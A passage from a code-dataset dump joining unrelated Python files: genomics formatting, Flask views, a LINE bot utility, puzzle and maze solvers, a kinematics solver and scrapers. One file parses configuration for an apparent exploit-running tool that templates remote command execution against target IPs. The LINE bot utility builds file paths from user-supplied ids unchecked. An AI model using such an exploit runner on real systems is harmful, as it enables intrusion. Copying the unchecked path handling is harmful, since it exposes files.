argparse\nimport pandas as pd\nimport sys\n\n\ndef main():\n\n # Parse args\n args = parse_args()\n\n # Load data\n data = pd.read_csv(args.inf, sep='\\t', header=0)\n\n # Split variant ID into parts\n var_split = data['variant_id'].str.split('_', expand=True)\n var_split.columns = ['chrom', 'pos', 'other_allele', 'effect_allele', 'build']\n\n # Join\n data = pd.concat([var_split, data], axis=1)\n data['chrom'] = data['chrom'].astype(str)\n data['pos'] = data['pos'].astype(int)\n\n # Fix gene_ids\n data['gene_id'] = data['gene_id'].apply(lambda gene: gene.split('.')[0])\n\n # Replace chrom X for 23\n # data = data.replace(to_replace={'chrom':{'X': '23'}})\n\n # Select required columns\n data = data.rename(columns={\n 'slope': 'beta',\n 'slope_se': 'se',\n 'gene_id': 'ensembl_id',\n 'pval_nominal': 'pval'})\n data = data.loc[:, ['chrom','pos', 'other_allele', 'effect_allele',\n 'ensembl_id', 'beta', 'se', 'pval']]\n data = data.sort_values(['chrom', 'pos'])\n\n data.to_csv(args.outf, sep='\\t', index=None, compression='gzip')\n\n return 0\n\ndef parse_args():\n \"\"\" Load command line args \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--inf', metavar=\"\", help=('Input file'), type=str, required=True)\n parser.add_argument('--outf', metavar=\"\", help=(\"Output file\"), type=str, required=True)\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"scripts/gtex7_format_cisreg.py","file_name":"gtex7_format_cisreg.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"376263445","text":"'''\nConfiguration\n'''\n\n__author__ = 'Linjun'\n\nimport config.config_default\n\nfrom collections import Mapping\n\nclass Config(dict):\n '''\n Simple setting support access as x.y style.\n '''\n\n def __init__(self, configs):\n super(Config, self).__init__(**configs)\n for k, v in configs.items():\n self[k] = Config(v) if isinstance(v, Mapping) else v\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n raise AttributeError(r\"'Setting' has not attribute '%s'\" % key)\n \n def __setattr__(self, key, value):\n self[key] = value\n\n def merge(self, u):\n for k, v in u.items():\n if isinstance(v, Mapping):\n self.get(k).merge(v)\n else:\n self[k] = v\n\n\ntry:\n configs = Config(config_default.configs)\n import config.config_override\n configs.merge(config_override.configs)\nexcept ImportError as e:\n pass","sub_path":"www/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"578202263","text":"# controller for querying alpha vantage api\nimport requests\nfrom project import app\nimport pdb\n\n\nalpha_v_base = 'https://www.alphavantage.co/query'\n\ndef get(request, stock_symbol):\n payload = {\n 'function': 'TIME_SERIES_INTRADAY',\n 'symbol': stock_symbol,\n 'interval': request.args.get('interval', '') or '1min',\n 'outputsize': 'compact',\n 'datatype': 'json',\n 'apikey': app.config['ALPHA_V_KEY']\n }\n req = requests.get(alpha_v_base, params=payload)\n return req.text\n","sub_path":"server/project/controllers/stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"388728941","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n###\n### Core > Settings \n###\n\"\"\"\n\nexploits.conf:\n-------------\nFor each exploit:\n[exploit_name]\ntype = rce-blind | rce-standard\ncommand = Command to run the exploit, with tags\nsuccess = String matching success (optional)\n\nSupported Tags for command:\n---------------------------\n[IP] : Target IP\n[PORT] : Target Port\n[SSL true=\"value\"] : Replaced by \"value\" if SSL/TLS\n[LOCALIP] : Local IP\n[CMD] : Location for command to execute on remote system\n Command will be repeated to try to execute Linux\n command once, and then Windows command (assume, \n target OS is not known)\n[CMDLINUX] : Location for Linux command to execute\n[CMDWINDOWS] : Location for Windows command to execute\n\"\"\"\nimport os\nimport traceback\nimport configparser\nfrom datetime import datetime\nfrom collections import defaultdict\n\nfrom lib.core.Config import *\nfrom lib.core.Exploit import Exploit\nfrom lib.core.Exceptions import SettingsException\nfrom lib.utils.DefaultConfigParser import DefaultConfigParser\nfrom lib.utils.OutputUtils import OutputUtils\n\n\nclass Settings:\n\n def __init__(self):\n \"\"\"\n Start the parsing of settings files and create the Settings object.\n\n :raises SettingsException: Exception raised if any error is encountered while \n parsing files\n \"\"\"\n self.exploits = list()\n\n # Check presence of exploits.conf files\n if not os.access(EXPLOITS_CONF, os.F_OK):\n raise SettingsException('Missing configuration file exploits.conf')\n\n # Parse configuration file\n self.__parse_conf_file()\n \n\n #------------------------------------------------------------------------------------\n\n def __parse_conf_file(self):\n parser = DefaultConfigParser()\n # Utf-8 to avoid encoding issues\n parser.read(EXPLOITS_CONF, 'utf8')\n\n for section in parser.sections():\n type_ = parser.safe_get(section, 'type', '', None)\n if type_ not in SUPPORTED_TYPES:\n raise SettingsException('Unsupported exploit type for [{}]'.format(type_))\n\n rawcmd = parser.safe_get(section, 'command', '', None)\n if not rawcmd:\n raise SettingsException('No command specified for [{}]'.format(rawcmd))\n\n description = parser.safe_get(section, 'description', '', None)\n success = parser.safe_get(section, 'success', '', None)\n\n exploit = Exploit(section, description, type_, rawcmd, success)\n self.exploits.append(exploit)\n\n\n def get_exploit(self, name):\n for xpl in self.exploits:\n if name.lower() == xpl.name.lower():\n return xpl\n return None\n\n\n def show_list_exploits(self):\n data = list()\n columns = [\n 'Name',\n 'Description',\n 'Type',\n ]\n\n for xpl in self.exploits:\n data.append([\n xpl.name,\n xpl.description,\n xpl.type,\n ]) \n\n OutputUtils.table(columns, data, hrules=False)\n\n\n","sub_path":"lib/core/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"8064012","text":"from flask import render_template, session, redirect, url_for, jsonify\nfrom flask import request\n\nfrom app import Comments\nfrom app import Family\nfrom app.extensions.database import db\nfrom . import main\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html', name='123')\n\n\n@main.route('/plan', methods=['GET', 'POST'])\ndef plan():\n # family = Family(name='张瑞宇', description='爱爱的到底是啥', relation='铲屎少年')\n # db.session.add(family)\n # db.session.commit()\n # Family.getAllMembers()\n return render_template('plan.html', name='123')\n\n\n@main.route('/about', methods=['GET', 'POST'])\ndef about():\n members = Family.getAllMembers()\n return render_template('about.html', members=members)\n\n\n@main.route('/message_board', methods=['GET', 'POST'])\ndef message_board():\n comments = Comments.getComments(0)\n return render_template('comments.html', comments=comments)\n\n\n@main.route('/addFamily', methods=['GET', 'POST'])\ndef addFamily():\n try:\n name = request.form['name']\n nick_name = request.form['nick_name']\n description = request.form['description']\n relation = request.form['relation']\n family = Family(name=name, nickname=nick_name, description=description, relation=relation)\n db.session.add(family)\n db.session.commit()\n except:\n return jsonify({'code': 100})\n return jsonify({'code': 200})\n\n\n@main.route('/comment', methods=['GET', 'POST'])\ndef addcomment():\n try:\n name = request.form['name']\n description = request.form['description']\n family = Comments(name=name, description=description)\n db.session.add(family)\n db.session.commit()\n except:\n return jsonify({'code': 100})\n return jsonify({'code': 200})\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"652855644","text":"import numpy as np\nfrom mujoco_py import functions as mj_fns\n\n\ndef get_jacobian(model, data, bodyid):\n pos = np.zeros((3, model.nv))\n rot = np.zeros((3, model.nv))\n mj_fns.mj_kinematics(model, data)\n mj_fns.mj_comPos(model, data)\n mj_fns.mj_jacBody(model, data, pos.reshape(-1), rot.reshape(-1), bodyid)\n return np.concatenate((pos, rot))\n\n\ndef solve_qp_ik_vel(vel, jac, joint_pos, joint_lims=None, duration=None, margin=0.2, solver=None):\n \"\"\"\n Solves the IK for a given pusher velocity using a QP solver, imposing joint limits.\n If the solution is optimal, it is guaranteed that the resulting joint velocities will not\n cause the joints to reach their limits (minus the margin) in the specified duration of time\n :param vel: desired EE velocity\n :param jac: jacobian\n :param joint_pos: current joint positions\n :param joint_lims: matrix of joint limits; if None, limits are not imposed\n :param duration: how long the specified velocity will be kept (in seconds); if None, 2.0 is used\n :param margin: maximum absolute distance to be kept from the joint limits\n :param solver: the name of the solver to be used\n :return: tuple with the solution (as a numpy array) and with a boolean indincating if the result is optimal or not\n :type vel: np.ndarray\n :type jac: np.ndarray\n :type joint_pos: np.ndarray\n :type joint_lims: np.ndarray\n :type duration: float\n :type margin: float\n :type solver: str\n :rtype: (np.ndarray, bool)\n \"\"\"\n\n import cvxopt\n x_len = len(joint_pos)\n\n P = cvxopt.matrix(np.identity(x_len))\n A = cvxopt.matrix(jac)\n b = cvxopt.matrix(vel)\n q = cvxopt.matrix(np.zeros(x_len))\n\n if duration is None:\n duration = 2.\n\n if joint_lims is None:\n G, h = None, None\n else:\n G = duration * np.identity(x_len)\n h = np.zeros(x_len)\n for i in range(x_len):\n dist_up = abs(joint_lims[i, 1] - joint_pos[i])\n dist_lo = abs(joint_lims[i, 0] - joint_pos[i])\n if dist_up > dist_lo:\n # we are closer to the lower limit\n # => must bound negative angular velocity, i.e. G_ii < 0\n h[i] = dist_lo\n G[i, i] *= -1\n else:\n # we are closer to the upper limit\n # => must bound positive angular velocity, i.e. G_ii > 0\n h[i] = dist_up\n h = cvxopt.matrix(h - margin)\n G = cvxopt.matrix(G)\n\n if solver is None:\n qp_kwargs = dict(options=dict(show_progress=False))\n elif solver == 'ldl':\n qp_kwargs = dict(options=dict(show_progress=False, kktreg=1e-9), kktsolver='ldl')\n elif solver == 'mosek':\n import mosek\n qp_kwargs = dict(options=dict(show_progress=False, mosek={mosek.iparam.log: 0}), solver='mosek')\n else:\n raise NotImplementedError\n\n sol = cvxopt.solvers.qp(P, q, A=A, b=b, G=G, h=h, **qp_kwargs)\n\n x = np.array(sol['x']).reshape(-1)\n optimal = sol['status'] == 'optimal'\n\n return x, optimal\n","sub_path":"gym/utils/kinematics.py","file_name":"kinematics.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"49304363","text":"import requests # взаимодействие с сетью\nimport os\n\nurl = 'https://geekbrains.ru/'\n\n#response = requests.get(url)\n#print(response.text)\n\n#os.mkdir('test_mkdir')\n#os.rmdir('test_mkdir')\n\nprint(os.listdir())\nprint(os.path.isdir('.gitignore')) # папка или нет\n\nif __name__ == '__main__':\n pass\n\nprint(__name__)\n\ndef get_htm():\n url='https://geekbrains.ru/'\n response =requests.get(url)\n return response.text\n\n\ndef get_image(url):\n response = requests.get(url)\n return response.content\n\ndef save_image(file_path, image_bytes):\n with open(file_path, 'wb') as file:\n file.write(image_bytes)\n\n\ndef save_html_to_file(file_path, htm_text):\n with open(file_path, 'w', encoding='UTF-8') as file:\n file.write(html_text)\n\n\nif __name__ == '__main__':\n img_url = 'https://arsenal-info.ru/img/1198779448/img_1.jpg'\n file_name = 'temp_gb_main.html'\n file_folder = os.path.dirname(__file__)\n file_path = os.path.join(file_folder, file_name)\n image_path = os.path.join(file_folder, 'img_1.jpg')\n html_text = get_htm()\n #save_html_to_file(file_path,html_text)\n\n img_bytes = get_image(img_url)\n save_image(image_path, img_bytes)\n\n","sub_path":"les5.py","file_name":"les5.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586349575","text":"from slacker import Slacker\n# from slack import WebClient\n# from slack.errors import SlackApiError\nimport os\n\nSLACK_TOKEN = os.environ.get('SLACK_TOKEN')\n\n\ndef slack_notify(text=None, channel='#5_db_crawler', attachments=None):\n token = SLACK_TOKEN\n slack = Slacker(token)\n slack.chat.post_message(channel=channel, text=text, attachments=attachments)\n\n\n# def slack_upload_file(file_path):\n# client = WebClient(token=os.environ['SLACK_TOKEN'])\n# try:\n# response = client.files_upload(\n# channels='#5_db_crawler',\n# file=file_path)\n# assert response[\"file\"] # the uploaded file\n# except SlackApiError as e:\n# # You will get a SlackApiError if \"ok\" is False\n# assert e.response[\"ok\"] is False\n# assert e.response[\"error\"] # str like 'invalid_auth', 'channel_not_found'\n# print(f\"Got an error: {e.response['error']}\")\n\n\nif __name__ == '__main__':\n slack_notify('new order created', channel='#7_order')\n","sub_path":"app/utils/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106892897","text":"\"\"\"\n16236 아기 상어\n\n아기 상어가 물고기를 잡아 먹으러 다닌다.\n자기보다 작은 물고기만 먹을 수 있다.\n1초에 상하좌우로 이동가능\n자기보다 큰 물고기가 있는 칸은 못 지나간다.\n같은 크기의 물고기가 있는 칸은 지나간다.\n\n더이상 먹을 수 있는 물고기가 없으면 끝\n먹을 수 있는 물고기가\n 1마리면 그거 먹음\n 여러마리면 비교\n 가장 가까운 물고기 먹음\n 여러마리면\n 가장 위에 물고기\n 여러마리면\n 가장 왼쪽 물고기\n크기가 2인 물고기가 2마리 물고기 먹으면 3으로 성장\n\n2 <= N <= 20\n0 빈칸\n1-6 물고기\n9 아기상어\n\n알고리즘: BFS\n\n1. 물고기들의 크기와 위치를 저장하고 크기순으로 정렬\n2. 반복\n 1. 현위치로부터 먹을 수 있는 가장 가까운 물고기 찾고 거리 저장\n 2. 그곳으로 위치이동 및 시간 추가\n 3. 물고기 없애기\n 4. 물고기 먹은 수 업데이트\n 1. 크기만큼 먹었으면 크기 up\n\"\"\"\nfrom collections import deque\nimport sys\nread = sys.stdin.readline\n\nn = int(read().strip())\n\nfishes = []\narea = []\nfor a in range(n):\n area.append(list(map(int, read().strip().split())))\n for b, v in enumerate(area[a]):\n if v == 9:\n baby_shark = [2, a, b, 0]\n area[a][b] = 0\n\n\ndxy = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n\n\ndef find_fish():\n age, sx, sy, _ = baby_shark\n visit = {(sx, sy): True}\n q = deque([(sx, sy)])\n\n fishes_tmp = []\n d = 1\n while q:\n qsize = len(q)\n for _ in range(qsize):\n x, y = q.popleft()\n\n for dx, dy in dxy:\n nx, ny = x+dx, y+dy\n if not (0 <= nx < n and 0 <= ny < n):\n continue\n if (nx, ny) in visit:\n continue\n fish_age = area[nx][ny]\n if fish_age <= age:\n q.append((nx, ny))\n visit[(nx, ny)] = True\n if 0 < fish_age < age and (d, nx, ny) not in fishes_tmp:\n fishes_tmp.append((d, nx, ny))\n d += 1\n\n if fishes_tmp:\n fishes_tmp = sorted(fishes_tmp)\n d, x, y = fishes_tmp[0]\n result = (area[x][y], x, y)\n return d, result\n\n return 0, 0\n\n\ndef grow():\n if baby_shark[0] == baby_shark[3]:\n baby_shark[0] += 1\n baby_shark[3] = 0\n\n\ntime = 0\n\nwhile True:\n distance, fish = find_fish()\n if distance == 0:\n break\n\n baby_shark = [baby_shark[0], fish[1], fish[2], baby_shark[3]+1]\n\n grow()\n\n time += distance\n\n area[fish[1]][fish[2]] = 0\n\n\nprint(time)","sub_path":"code/16236_baby_shark.py","file_name":"16236_baby_shark.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"404696287","text":"import re\nfrom functools import reduce\n\n\ndef standardize_column_name(column_name, table_name):\n\n if column_name.lower() in ['date', '']:\n return '\"DATE\"'\n\n new_column_name = column_name.replace(' ', '_')\n new_column_name = re.sub('[^0-9a-zA-Z_]+', '', new_column_name)\n\n first_digit_finder = re.search('\\d', new_column_name)\n if new_column_name[0:2] in ['M1', 'M2']:\n new_column_name = new_column_name[2:]\n\n elif first_digit_finder is not None:\n new_column_name = new_column_name[first_digit_finder.start():]\n else:\n print(\"Couldn't format {}, continuing...\".format(column_name))\n return None\n\n if new_column_name[0] in ['0', '1']:\n new_column_name = '20' + new_column_name\n else:\n new_column_name = '19' + new_column_name\n \n first_non_digit_finder = re.search('\\D', new_column_name)\n if first_non_digit_finder is not None:\n year = new_column_name[:first_non_digit_finder.start()]\n suffix = new_column_name[first_non_digit_finder.start():]\n prefix = suffix[0].lower()\n\n if prefix == 'm':\n if len(suffix) == 3:\n suffix = suffix[1:] + '01'\n elif len(suffix) == 2:\n suffix = '0' + suffix[1:] + '01'\n else:\n print(\"Couldn't format {}, continuing...\".format(column_name))\n return None\n\n elif prefix == 'q':\n if suffix[1:] == '1':\n suffix = '0101'\n elif suffix[1:] == '2':\n suffix = '0401'\n elif suffix[1:] == '3':\n suffix = '0701'\n elif suffix[1:] == '4':\n suffix = '1001'\n else:\n print(\"Couldn't format {}, continuing...\".format(column_name))\n return None\n\n else:\n print(\"Couldn't format {}, continuing...\".format(column_name))\n return None\n\n return prefix + year + suffix\n\n return column_name\n\n\ndef standardize_value(value):\n\n if value is None or value == '#N/A':\n return 'NULL'\n\n if ':' in value:\n year = value[:4]\n\n if 'q' in value.lower():\n if value[-1] == '1':\n date_n_month = '0101'\n elif value[-1] == '2':\n date_n_month = '0401'\n elif value[-1] == '3':\n date_n_month = '0701'\n elif value[-1] == '4':\n date_n_month = '1001'\n else:\n print('Could not parse value: {}'.format(value))\n return 'NULL'\n\n else:\n date_n_month = value[-2:] + '01'\n\n value = \"'\" + year + date_n_month + \"'::DATE\"\n\n elif re.search('[a-zA-Z]', value):\n value = \"'\" + value + \"'\"\n \n return value\n\n\ndef monthly_or_quarterly(row):\n for key, value in row.items():\n stripped_key = re.sub('[^a-z]+', '', key.lower())\n if len(stripped_key) > 0:\n if stripped_key[-1] == 'm':\n return 'monthly'\n if stripped_key[-1] == 'q':\n return 'quarterly'\n\n return 'unknown'\n\n\ndef string_list(actual_list):\n return reduce(\n lambda string_list, value: string_list + str(value) + \", \",\n actual_list,\n ''\n )[0:-2]\n\n","sub_path":"data_parsing/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538599214","text":"import os\nimport json\nfrom django.conf import settings as djangoSettings\nfrom .models import oper_para\nimport logging\n\n\n#fileroute = djangoSettings.STATIC_ROOT + '\\\\'\n#fileroute = 'D:\\\\virenv\\\\bot_static' + '\\\\'\nfileroute = djangoSettings.FILE_ROUTE\n\n#prefilename = 'bot\\linemsg_'\nprefilename = djangoSettings.PREFILENAME\n\n\ndef GetTimeStamp():\n from datetime import datetime\n import calendar\n m = calendar.timegm(datetime.now().timetuple())\n return m\n\ndef ReadFromStaticBOT(mid):\n import json\n import sys\n sys.setdefaultencoding='utf8'\n\n filename = prefilename + mid\n filepath = fileroute + filename\n with open(filepath) as json_data:\n d = json.load(json_data)\n return json.dumps(d)\n\ndef WriteToStaticBOT(msgstr='',way=''):\n from datetime import datetime\n import calendar\n #import sys\n #sys.setdefaultencoding='utf8'\n msgjson = json.loads(msgstr)\n\n mid = mid = msgjson['events'][0]['source']['userId']\n mtext = msgjson['events'][0]['message']['text']\n \n filename = prefilename + mid\n filepath = fileroute + filename\n tstamp = calendar.timegm(datetime.now().timetuple())\n #確認檔案是否存在\n if os.path.isfile(filepath):\n #print u'有檔案'.encode('utf-8')\n print (u'有檔案')\n with open(filepath) as msgkeep:\n jdata = json.load(msgkeep)\n stepcnt = jdata['nowstep']\n \n jdata['timestamp'] = tstamp\n talk = jdata['step' + str(stepcnt)]\n if way == 'ask':\n \n stepcnt = stepcnt + 1\n jdata['step' + str(stepcnt)] = {}\n jdata['step' + str(stepcnt)]['ask'] = mtext\n #print 'ask:' + mtext.encode('utf-8')\n else: #reply\n talk['reply'] = mtext\n #print 'reply:' + mtext.encode('utf-8')\n \n jdata['nowstep'] = stepcnt\n \n with open(filepath, 'w+') as msgwrite:\n #msgwrite.write(json.dumps(jdata,encoding=\"UTF-8\", ensure_ascii=False).encode('utf-8'))\n msgwrite.write(json.dumps(jdata))\n msgwrite.close()\n \n else:\n #print u'沒檔案'.encode('utf-8')\n print (u'沒檔案')\n step = 0\n msgkeep = {}\n msgkeep['timestamp'] = tstamp\n msgkeep['nowstep'] = step\n msgkeep['step' + str(step)] = {}\n msgkeep['step' + str(step)]['ask'] = mtext\n #print 'ask:' + mtext.encode('utf-8')\n \n file = open(filepath , 'w+')\n file.write(json.dumps(msgkeep))\n file.close()\n\ndef CheckStep(mid=''):\n purporse = ''\n step = 0\n last_ask = ''\n timestamp = 0\n last_reply=''\n\n filename = prefilename + mid\n print (filename)\n #filepath = './' + djangoSettings.STATIC_URL + '/bot/' + filename\n filepath = fileroute + filename\n print (filepath)\n \n #先確認檔案是否存在\n if os.path.exists(filepath):\n with open(filepath) as json_data:\n data= json.load(json_data)\n step = data['nowstep']\n purporse = data['step0']['ask']\n if step == 0:\n last_ask = data['step' + str(step)]['ask']\n #last_reply = data['step' + str(step)]['reply']\n else:\n last_ask = data['step' + str(step - 1)]['ask']\n last_reply = data['step' + str(step - 1)]['reply']\n timestamp = data['timestamp']\n \n return purporse,step,last_ask,last_reply,timestamp\n\ndef CheckDialog(mid):\n filepath = fileroute + prefilename + mid\n if os.path.isfile(filepath):\n return True\n \n\ndef RemoveDialog(mid):\n filepath = fileroute + prefilename + mid\n os.remove(filepath)\n\n\ndef chkDict(dict={},key=''):\n try:\n x = dict[key]\n return True\n except KeyError:\n return False\n\ndef isfloat(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\ndef isint(value):\n try:\n int(value)\n return True\n except ValueError:\n return False\n\n\n\ndef writelog(logstr):\n if oper_para.objects.get(name='DebugMode').content != 'Y':\n return\n\n\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n sh = logging.StreamHandler()\n fh = logging.FileHandler(fileroute + '\\\\test.log')\n fh.setLevel(logging.DEBUG)\n sh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n sh.setFormatter(formatter)\n logger.addHandler(fh)\n logger.addHandler(sh)\n logger.info(logstr + '
')\n logger.removeHandler(sh)\n logger.removeHandler(fh)\n\ndef clearlog():\n if oper_para.objects.get(name='DebugMode').content != 'Y':\n return 'debug mode is closed'\n\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n sh = logging.StreamHandler()\n fh = logging.FileHandler(fileroute + '\\\\test.log',mode = 'w+')\n fh.setLevel(logging.DEBUG)\n sh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n sh.setFormatter(formatter)\n logger.addHandler(fh)\n logger.addHandler(sh)\n logger.info('log restarted
')\n logger.removeHandler(sh)\n logger.removeHandler(fh)\n return 'log cleared'\n \n \n\ndef getGlShortUrl(longrul):\n import requests\n import json\n strurl = 'https://www.googleapis.com/urlshortener/v1/url?key=' + oper_para.objects.get(name='GoogleShortUrlApiKey').content\n header= {\n \"Content-Type\":\"application/json\"\n }\n payload = {\"longUrl\": longrul}\n \n res = requests.post(strurl,headers = header,data=json.dumps(payload))\n return json.loads(res.text)['id']\n\ndef readlog():\n if oper_para.objects.get(name='DebugMode').content != 'Y':\n return 'debug mode is closed'\n try:\n logcontent = open (fileroute + '\\\\test.log','r')\n except FileNotFoundError:\n return 'log file not found'\n\n return logcontent.read()\n ","sub_path":"inbot/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"634685458","text":"#define a maze by list\n#5 means the wall \n#start postion is left up most pos.\n#target /gaol is right bottom most pos.\n#aim : to find the way from the start pos to goal by DFS & BFS\nimport sys\n#kp_maze = [[0,0,5,5,5,5],[5,0,5,0,0,5],[5,0,0,0,5,5],[5,0,5,0,5,5],[5,0,5,0,0,0],[5,5,5,5,5,0]]\n#kp_maze = [[0,5,5,5,5,5],[0,0,5,0,0,5],[5,0,5,0,5,5],[5,0,5,0,5,5],[5,0,0,0,5,5],[5,5,5,0,0,0]]\n#kp_maze = [[0,0,5,0,0,0],[5,0,5,0,5,0],[5,0,5,0,5,0],[5,0,0,0,5,0],[5,0,5,5,5,0],[5,0,0,0,5,0]]\nkp_maze = [[5,5,5,5,0,0],[5,0,0,0,5,5],[5,0,5,0,0,5],[5,0,0,5,0,5],[5,5,5,0,0,0],[0,0,5,0,5,0]]\n\n# pending feature \n#============================================#\n# expand the size of the maze \n# what would happen if there is no way out ?\n# generating the maze automatedly\n#\n#============================================#\n\n'''\nclass create_maze():\n\tdef __init__(self):\n\t\tpass\n\tdef choose_maze(self,opt):\n\t\tif opt == 1:\n\t\t\treturn [[0,0,5,5,5,5],[5,0,5,0,0,5],[5,0,0,0,5,5],[5,0,5,0,5,5],[5,0,5,0,0,0],[5,5,5,5,5,0]]\n\t\telif opt==2 :\n\t\t\treturn [[0,5,5,5,5,5],[0,0,5,0,0,5],[5,0,5,0,5,5],[5,0,5,0,5,5],[5,0,0,0,5,5],[5,5,5,0,0,0]]\n\t\telif opt==3 :\n\t\t\treturn [[0,5,5,5,5,5],[0,0,5,0,0,5],[5,0,5,0,5,5],[5,0,5,0,5,5],[5,0,0,0,5,5],[5,5,5,0,0,0]]\n\t\telse:\n\t\t\tpass\n'''\n\ndirection = {'W':(-1,0),'S':(0,1),'E':(1,0),'N':(0,-1)}\nDir = ['W','S','E','N']\nDEFAULT_CELL = [0,0] # (visited,direction)\nstart_pos = 20\ntarget_pos = 35\n\nclass solve_maze():\n\tdef __init__(self):\n\t\tself.w_maze = 6\n\t\tself.h_maze = 6\n\t\ttotal_cells = self.w_maze * self.h_maze\n\t\tself.maze_array = [DEFAULT_CELL]*total_cells\n\t\tself.curr_pos = 0\n\t\tself.step_n = 0 \n\tdef dfs_solver(self,maze,start_pos,target_pos):\n\t\tself.Que = []\n\t\tself.curr_pos = start_pos\n\t\tself.Que.append(self.curr_pos)\n\t\tself.maze_array[self.curr_pos] = [1,0]\n\t\tfor kk in range(50):\n\t\t\tif not self.check_if_exit(self.curr_pos):\t\t\n\t\t#while self.check_if_exit() == 0:\n\t\t\t\tself.cell_neighbor(self.curr_pos)\n\t\t\tself.show_state()\n\n\tdef solution_array(self):\n\t\tpass\n\t\n\tdef cell_neighbor(self,cell):\n\t\tcurr_x , curr_y = self.cell_x_y(cell)\n\t\tind = 0\n\t\tfor i in Dir:\n\t\t\tnew_x = curr_x + direction[i][0]\n\t\t\tnew_y = curr_y + direction[i][1]\n\t\t\tprint((curr_x,curr_y),'->',(new_x,new_y))\n\t\t\tif (new_x >=0) & (new_x < self.w_maze):\n\t\t\t\tif (new_y >=0 ) & (new_y< self.h_maze):\t\t\n\t\t\t\t\tnew_cell = self.x_y_cell(new_x,new_y)\n\t\t\t\t\tif not self.visited_cell(new_cell):\n\t\t\t\t\t\t#print('new cell is ', (new_cell,new_x,new_y))\t\n\t\t\t\t\t\t#print('new cell value is ' ,kp_maze[new_x][new_y])\t\t\n\t\t\t\t\t\tif kp_maze[new_x][new_y] == 0: # there is not a wall\n\t\t\t\t\t\t\tself.Que.append(new_cell)\t\n\t\t\t\t\t\t\tself.step_n += 1\n\t\t\t\t\t\t\tind = 1\t\t\t\t\t\t\n\t\t\t\t\t\t\tself.go_to_cell(cell,new_cell)\t\n\t\t\t\t\t\t\t\n\t\tif \tind ==0 :\n\t\t\t# stack is empty\n\t\t\tprint('there is no way to go')\n\t\t\tprint('from %d to %d' % (cell,self.Que[-1]))\n\t\t\tself.Que.pop(-1)\t\t\t\n\t\t\tself.go_to_cell(cell,self.Que[-1])\t\n\t\t\t\n\n\tdef cell_x_y(self,cell): #confirmed\n\t\ty = cell % self.w_maze\n\t\tx = cell // self.w_maze\n\t\treturn x,y\n\tdef x_y_cell(self,x,y): #confirmed\n\t\treturn 6*x+y\n\n\tdef visited_cell(self,cell):\n\t\tif self.maze_array[cell][0] == 1: #visited\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\tdef go_to_cell(self,from_cell,to_cell):\n\t\tprint('========')\n\t\tprint('into go_to_cell function')\n\t\tprint('go to cell %d' % (to_cell))\n\t\tself.maze_array[to_cell] = [1,0]\n\t\tif to_cell - from_cell == 1:\n\t\t\tself.maze_array[from_cell] = [1,Dir[2]]\n\t\telif to_cell-from_cell == 6:\n\t\t\tself.maze_array[from_cell] = [1,Dir[1]]\n\t\telif to_cell-from_cell == -6:\n\t\t\tself.maze_array[from_cell] = [1,Dir[3]]\n\t\telif to_cell-from_cell == -1:\n\t\t\tself.maze_array[from_cell] = [1,Dir[0]]\n\t\telse:\n\t\t\tprint('something wrong!')\n\t\tself.curr_pos = to_cell\n\n\tdef show_state(self):\n\t\tprint('current pos',self.curr_pos)\n\t\tprint('stack',self.Que)\n\t\n\tdef check_if_exit(self,cell):\n\t\tprint('into check if exit')\n\t\tif cell == target_pos:\n\t\t\tprint('Congradulation!')\n\t\t\tself.solution_array\n\t\t\tsys.exit()\n\t\telse:\n\t\t\tprint('Current pos: %d' % (self.curr_pos))\n\t\t\tprint('keep going!')\n\t\t\treturn 0\n\t\t\n\ndef main():\n\tcurrent_maze = solve_maze()\t \n\tcurrent_maze.dfs_solver(kp_maze,start_pos,target_pos)\n\n\t\nif __name__ == '__main__':\n\tmain()\n","sub_path":"練習/path finding/maze/DFS_Solver.py","file_name":"DFS_Solver.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"346807343","text":"class GEItem:\n def __init__(self, id = -1, name 